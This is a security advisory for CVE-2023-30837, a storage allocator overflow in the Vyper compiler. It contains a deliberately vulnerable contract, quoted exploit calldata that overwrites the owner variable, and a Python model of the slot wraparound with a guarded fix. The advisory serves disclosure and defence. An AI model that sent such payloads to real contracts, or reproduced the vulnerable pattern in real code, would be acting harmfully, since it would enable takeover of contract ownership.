CVE-2023-30837: vyper vulnerable to storage allocator overflow
The storage allocator does not guard against allocation overflows. This can result in vulnerabilities like the following:
```vyper
owner: public(address)
take_up_some_space: public(uint256[10])
buffer: public(uint256[max_value(uint256)])

@external
def initialize():
    self.owner = msg.sender

@external
def foo(idx: uint256, data: uint256):
    self.buffer[idx] = data
```
Per @toonvanhove, “An attacker can overwrite the owner variable by calling this contract with calldata: `0x04bc52f8 fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff5 ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff` (spaces inserted for readability). `0x04bc52f8` is the selector for `foo(uint256, uint256)`, and the last argument `fff...fff` is the new value for the owner variable.”
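The slot arithmetic behind the quoted calldata, as an added example that is not Vyper's own code: a simplified model that assumes variables receive consecutive slots in declaration order (one slot per address or uint256 element) and that slot addition wraps modulo 2**256. The names `allocate`, `element_slot` and `variable_at_slot` are hypothetical; the `guard` option shows the kind of bounds check the advisory says the allocator lacked.

```python
# Simplified model of sequential storage-slot allocation (illustrative, not
# the Vyper compiler's code). Assumes one 32-byte slot per address/uint256
# element and EVM slot arithmetic modulo 2**256.
SLOT_SPACE = 2**256

# Layout of the contract shown on this page: (name, slots occupied)
LAYOUT = [
    ("owner", 1),
    ("take_up_some_space", 10),
    ("buffer", 2**256 - 1),  # max_value(uint256) elements
]

# idx argument from the calldata quoted on this page (equals 2**256 - 11)
IDX = int("f" * 63 + "5", 16)


def allocate(layout, guard):
    """Assign base slots in declaration order. With guard=True, reject any
    variable whose slot range would run past the 2**256 address space."""
    bases, next_slot = {}, 0
    for name, size in layout:
        if guard and next_slot + size > SLOT_SPACE:
            raise OverflowError(f"{name}: allocation ends past slot 2**256 - 1")
        bases[name] = next_slot
        next_slot += size
    return bases


def element_slot(bases, name, idx):
    """Slot touched by name[idx]; the addition wraps like the EVM's ADD."""
    return (bases[name] + idx) % SLOT_SPACE


def variable_at_slot(bases, layout, slot):
    """Name of the variable whose declared slot range contains `slot`."""
    for name, size in layout:
        if bases[name] <= slot < bases[name] + size:
            return name
    return None


if __name__ == "__main__":
    bases = allocate(LAYOUT, guard=False)        # unguarded: buffer base is 11
    slot = element_slot(bases, "buffer", IDX)    # 11 + (2**256 - 11) wraps to 0
    print(f"buffer[idx] writes slot {slot}: {variable_at_slot(bases, LAYOUT, slot)}")
    try:
        allocate(LAYOUT, guard=True)
    except OverflowError as exc:
        print("guarded allocator rejects the layout:", exc)
```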
References
- github.com/advisories/GHSA-mgv8-gggw-mrg6
- github.com/pypa/advisory-database/tree/main/vulns/vyper/PYSEC-2023-76.yaml
- github.com/vyperlang/vyper
- github.com/vyperlang/vyper/commit/0bb7203b584e771b23536ba065a6efda457161bb
- github.com/vyperlang/vyper/security/advisories/GHSA-mgv8-gggw-mrg6
- nvd.nist.gov/vuln/detail/CVE-2023-30837